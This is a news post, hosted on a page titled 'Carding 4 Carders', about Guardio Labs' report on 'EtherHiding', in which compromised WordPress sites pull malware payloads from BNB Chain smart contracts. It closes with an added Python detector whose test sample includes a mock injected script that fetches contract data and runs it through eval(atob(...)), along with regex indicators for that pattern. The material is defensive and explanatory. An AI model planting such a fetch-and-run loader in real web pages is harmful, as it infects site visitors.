Carding 4 Carders
Cybercriminals use smart contracts on the BNB Chain network to hide and distribute malware, experts at Guardio Labs have discovered.
In a report, the researchers described a hacking technique called EtherHiding. The attack involves compromising websites running on the WordPress engine by injecting JavaScript code that then retrieves payloads from contracts on the blockchain.
This is a modified method of the previously detected ClearFake campaign. Attackers posted code for the second stage of the attack on Cloudflare Workers, but the American company began blocking accounts, potentially hindering hacking attempts.
Hackers used the Web3 infrastructure from the Binance-supported BNB Chain network. This provided them with virtually free, "truly bulletproof hosting supported by the blockchain," the researchers emphasized.
Attackers can easily and cheaply change the code and, accordingly, the attack vector at their discretion.
In one of the methods discovered by experts, victims are asked to update their browser to access the requested content. When clicking on the link, the user downloads malware from a domain controlled by hackers, infecting the computer.
Attackers can modify the attack chain by changing the smart contract with a single blockchain transaction, which costs approximately $0.2 to $0.6.
Example of a BNB Chain contract that is constantly modified by hackers
Experts noted that once deployed on the network, contracts work independently, and all that BNB Chain developers can do is mark them as malicious. However, it is obvious that today there is no way to stop hackers from spreading their software this way, experts stressed.
Example of marking malicious contracts
According to them, WordPress sites serve as the main gateway for such attacks. Experts recommended that owners take all possible precautions, regularly updating plugins, changing passwords and simply "monitoring what is happening on the site."
The researchers noted that the use of blockchain poses new challenges for preventing the spread of malware, since it rules out traditional blocking by the provider.
"While Web 3.0 portends innovation, attackers are constantly adapting, exploiting its benefits for nefarious purposes. As for Binance, we can't blame them, since the data is free for everyone, and everyone can check and detect the danger," the experts concluded.
Guardio Labs exposes "EtherHiding" — a new threat hiding in Binance's Smart Chain, a technique that evades detection, targeting compromised WordPress sites. Read about this game-changing method! @BNBCHAIN #BNBChain #CyberSecurity https://t.co/alNI5KqKUO
— Guardio (@GuardioSecurity) October 15, 2023
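A starting point for the "monitoring what is happening on the site" recommendation, as an added example that is not from the Guardio report or the original post: a Python scan of a page's scripts for blockchain access combined with dynamic code evaluation. The indicator patterns, the `fetchFromContract` helper in the sample and the placeholder address are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristic indicators chosen for this example (assumptions, not Guardio's rules).
INDICATORS = {
    "web3_library": re.compile(r"\b(ethers|web3)(\.min)?\.js\b|new\s+ethers\.|new\s+Web3\(", re.I),
    "json_rpc_call": re.compile(r"\beth_call\b"),
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "dynamic_eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\batob\s*\("),
}

class ScriptCollector(HTMLParser):
    """Collects inline script bodies and external script URLs from a page."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.chunks = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            src = dict(attrs).get("src")
            if src:
                self.chunks.append(src)
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:  # text outside <script> is ignored
            self.chunks.append(data)

def scan_page(html):
    """Return the sorted indicator names found in the page's scripts."""
    collector = ScriptCollector()
    collector.feed(html)
    text = "\n".join(collector.chunks)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_suspicious(html, site_uses_web3=False):
    """A non-Web3 site whose scripts reach a chain and evaluate the result needs review."""
    hits = set(scan_page(html))
    chain_access = hits & {"web3_library", "json_rpc_call", "contract_address"}
    return bool(chain_access) and "dynamic_eval" in hits and not site_uses_web3

# Constructed sample pages (not real captures); ADDR is a placeholder address.
ADDR = "0x" + "0" * 40
CLEAN = "<html><script src='/wp-includes/js/jquery/jquery.min.js'></script><p>" + ADDR + "</p></html>"
INJECTED = ('<html><script src="https://cdn.example/ethers.min.js"></script>'
            '<script>fetchFromContract("' + ADDR + '", "eth_call")'
            '.then(function (hex) { eval(atob(hex)); });</script></html>')
```

Run it against rendered pages and against theme and plugin files on a schedule, and diff the results over time: a new hit on a site that has no Web3 features is the signal worth investigating.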